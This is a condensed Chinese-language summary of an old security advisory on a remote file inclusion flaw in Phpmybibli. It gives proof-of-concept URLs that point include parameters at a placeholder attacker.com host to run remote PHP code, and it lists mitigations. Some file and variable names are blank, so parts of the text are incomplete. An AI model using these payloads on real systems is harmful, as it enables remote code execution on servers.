关键信息摘要 漏洞信息 - 漏洞名称: [ECHO_ADV_55$2006] Phpmybibli 漏洞描述 - 在 文件中,传递给 参数的输入在使用前未进行适当验证。攻击者可利用此漏洞通过从本地或外部资源包含文件来执行任意PHP代码。 受影响的文件 - - - - - - 等等 验证概念 - 示例URL: - [http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?](http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?) - [http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?](http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?) - [http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?](http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?) 解决方案 - 在受影响文件中对 , , 变量进行清洗。 - 关闭 。